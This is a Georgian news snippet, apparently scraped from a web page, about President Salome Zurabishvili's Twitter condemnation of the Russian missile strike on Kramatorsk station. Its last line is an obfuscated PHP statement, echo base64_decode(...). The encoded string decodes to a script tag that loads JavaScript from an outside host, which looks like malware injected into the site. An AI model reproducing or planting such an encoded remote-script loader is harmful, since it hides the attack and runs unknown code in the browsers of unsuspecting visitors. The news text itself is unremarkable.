celsiusi
ავერსი საქკაბელი
რუსეთის სასტიკი სიმხეცე კრამატორსკში, ენით აღუწერელი ხოცვა არის ადამიანის უფლებების დარღვევა, – ამის შესახებ საქართველოს პრეზიდენტი სალომე ზურაბიშვილი სოციალურ ქსელ „ტვიტერში“ წერს.
 
პრეზიდენტის თქმით, ასეთი ძალადობა კაცობრიობის ისტორიაში ბნელ ფურცლად დარჩება.
 
„ამგვარი ძალადობა დარჩება ბნელ ფურცლად კაცობრიობის ისტორიაში. ჩადენილია კაცობრიობის წინააღმდეგ ძალიან ბევრი დანაშაული. დიდება უკრაინას“, – წერს სალომე ზურაბიშვილი.
 
შეგახსენებთ, რომ დონეცკის ოლქის ქალაქ კრამატორსკში, რკინიგზის სადგურზე რუსმა ოკუპანტებმა სარაკეტო დარტყმები განახორციელეს, რის  შედეგადაც დაიღუპა 39 და დაშავდა 100-ზე მეტი ადამიანი.
 
911
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");